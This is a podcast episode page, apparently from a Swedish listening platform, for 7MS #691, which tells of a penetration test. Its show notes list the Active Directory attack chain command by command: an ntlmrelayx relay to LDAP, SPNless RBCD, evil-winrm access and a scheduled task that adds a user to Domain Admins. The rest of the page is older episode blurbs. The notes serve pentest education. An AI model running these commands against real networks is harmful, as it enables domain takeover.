7MS #691: Tales of Pentest Pwnage – Part 75

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode:

Got an SA account to a SQL server through Snaffler-ing
With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
…and ran it: schtasks /run /tn "TotallyFineTask"

Upptäck Premium

Prova 14 dagar kostnadsfritt

Skaffa Premium

Avsnitt(704)

7MS #79.5: UPDATE(!) on My Love-Hate Relationship with Nessus

In episode #79 I shared some gripes about Nessus. Those gripes were quickly answered by Tenable staff/support so I wanted to pass relevant updates on to you!

27 Juli 20156min

7MS #79: My Love-Hate Relationship with Nessus

In this episode I talk about one of my favorite vulnerability scanners, Nessus, and why I want to simultaneously hug it and punch it in the neck.

23 Juli 20157min

7MS #78: It's All About Segmentation

In this episode I advocate for proper network segmentation, as doing it (well and right!) can seriously reduce your risks!

21 Juli 20157min

7MS #77: OFFTOPIC-Rickrolling Your Coworkers for Fun and Profit

This week i used my Wifi Pineapple to scare and amuse my coworkers and lure them into a Rickroll trap. All the gory details in today's episode!

16 Juli 20157min

7MS #76: Lessons Learned from LastPass

I know this is a bit late, but I wanted to talk a little about the LastPass breach and why I'll still remain a customer.

14 Juli 20157min

7MS #75: OFFTOPIC-My Son's Piano Recital

I wanted to share (what I think is) an amusing anecdote about my son's first piano recital, which was topped off by a kid playing the song "Lucky." Many LOLs commenced for me.

9 Juli 20159min

7MS #74: How to Become a More Organized Information Security Professional

In this episode I share some strategies and apps that may help you stay more organized as you go about your infosec work!

8 Juli 20158min

7MS #73: PCI Pentesting 101 – Part 2 (audio)

This episode is the exciting continuation of a recent pentest I did, in which I got some serious pwnage, including cracking the domain admin password! 7MS #73: PCI Pentesting 101 – Part 2 (audio)

30 Juni 20157min

Allt en och samma app

Lyssna på dina favoritpoddar och ljudböcker på ett och samma ställe.

Noga utvalt innehåll

Njut av handplockade tips som passar din smak – utan ändlöst scrollande.

Fortsätt när du vill

Fortsätt lyssna där du slutade – även offline.

Premium

99 kr/ månad

Tillgång till alla Premium-poddar
Reklamfritt premium-innehåll
Avsluta när du vill

Prova 14 dagar gratis

Premium

129 kr/ månad

Tillgång till alla Premium-poddar
Reklamfritt premium-innehåll
Avsluta när du vill
Ett extra konto

Prova 14 dagar gratis

Populärt inom Politik & nyheter

Berättelserna och rösterna du älskar att lyssna på

Obegränsad lyssning på alla dina favoritpoddar och ljudböcker

Upptäck Premium